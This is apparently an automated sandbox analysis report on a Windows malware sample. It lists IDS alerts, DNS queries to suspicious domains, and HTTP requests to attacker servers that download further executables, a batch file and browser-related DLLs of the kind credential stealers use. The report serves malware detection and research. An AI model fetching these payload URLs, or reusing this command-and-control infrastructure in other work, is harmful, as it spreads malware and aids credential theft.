Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:55534 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55539 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63719 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63722 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63725 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63726 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63729 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63732 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63730 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63734 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63733 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63738 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63739 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63742 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63743 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63744 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63746 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63750 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63752 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63717 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63718 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63756 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63728 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63763 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63764 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63761 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63766 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63769 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63776 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63778 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63781 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:63782 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63786 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63787 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63788 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63790 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63796 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63797 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63803 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63802 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63794 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63804 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:63805 -> 188.114.96.3:443

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C49CC60 PR_Recv,

2_2_6C49CC60

Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /sok33tn HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: safewat.proConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/LostRobotic/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/1113209401/cBeNU75.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/6875802221/1AWhJsY.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/6691015685/Bjkm5hE.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.97

Source: global traffic	DNS traffic detected: DNS query: ignoredshee.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: cozyhomevpibes.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: edcatiofireeu.shop
Source: global traffic	DNS traffic detected: DNS query: impolitewearr.biz
Source: global traffic	DNS traffic detected: DNS query: toppyneedus.biz
Source: global traffic	DNS traffic detected: DNS query: lightdeerysua.biz
Source: global traffic	DNS traffic detected: DNS query: suggestyuoz.biz
Source: global traffic	DNS traffic detected: DNS query: hoursuhouy.biz
Source: global traffic	DNS traffic detected: DNS query: mixedrecipew.biz
Source: global traffic	DNS traffic detected: DNS query: affordtempyo.biz
Source: global traffic	DNS traffic detected: DNS query: pleasedcfrown.biz
Source: global traffic	DNS traffic detected: DNS query: rebeldettern.com
Source: global traffic	DNS traffic detected: DNS query: pKGhIPUplSdqEpyFxAgXdkn.pKGhIPUplSdqEpyFxAgXdkn
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: safewat.pro

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ignoredshee.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Feb 2025 19:21:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RgkXqYFDVtsHIbhV1CT%2FE89v%2BGyQ4hWmX0bWxIxgJfFA6Ua804v441XFOjX1atExYrrIEVHS%2FUdUVz8u2Zw5rBQRBVPiGhdMdcIbwe5V5KiBtXSh2TszQB4U74H7XSIXZlM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90edfb517ebec427-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Feb 2025 19:22:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p7efPBL2VgVgARm1R706s27DDqV1obDXwQtfZpOpgbFhIjShtCmvVRA2n%2BcvNwxQLRAHyeJjJrji6BSo7SOSDwucGgb%2FTPlXuDcouXIfWiFPQ%2FxBDy3QMJxvVUc5QP6Yn%2BJGgSgT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90edfd819fe53314-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Feb 2025 19:23:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZXmjUDZX3jD3VY1ee%2Bv9MpZXLGUYXHSZ%2F8KFy0xwTKgiW%2By8knzY3S2bAEUvFTIvZU7qwVdvFNH4CauHChwQj7aT6mIwVp0qn%2FBGM8As99nNnTLlBXBs85ln0JdBFt%2FCpw3FKTTVls%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90edfe3afbec435c-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Feb 2025 19:23:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JTwsPX%2BcGWqgY4fWE7Ca9tr2jQXZKgX%2B240De2vylYaw7RZaML6n%2BWnXSTMLqdSO8JJEe1mmWUb7gcfGWRq2pjAJ5BAmx9Wcr9JgXwnuKdDYmcvv1T7TCLaYf9wSaA8Ca8iw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90edfe61ad674372-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Feb 2025 19:23:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4lhwlyUjoomK26jpvgWoHRo47Kdso%2BWl%2BfBKQI%2BE%2F0%2F085QSY43aCmr8LkvxilCPnuFTr%2BEeezAkjfJGI9ZRsVeEpCMmtoecycflmyIi0z7bSXCILvmEE6gMbNcb02PsBpp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90edfef2392d6a58-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Feb 2025 19:23:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mxmW462jIe5iidAfGTCdJv4dFrkKdcSXIzAAaASotFwhUvINEYJ997hNgOtLGNP%2FNgnNGWOw3EgpSxWNGyKCmcuPwTr9%2Fnfs9mIYt3xjKTOqbQ3ckoLSleUvlphaU7VyBg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90edff08cd1e8c23-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Feb 2025 19:23:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=isC1xNwhi7XRPnosa8yCP3eyVtro0oVJThKI2iegdorJ8JumfNPjtuHDv%2BM8lBdB6V2I8yXJQe4vyUYMnUFcRx2pzBcB30QS1i88yLXCsL0r4TC8chSh26wISEdWO%2FfyYh4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90edff2cacc98ca2-EWR

Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001182000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dll
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll1V
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dllwQ
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dll
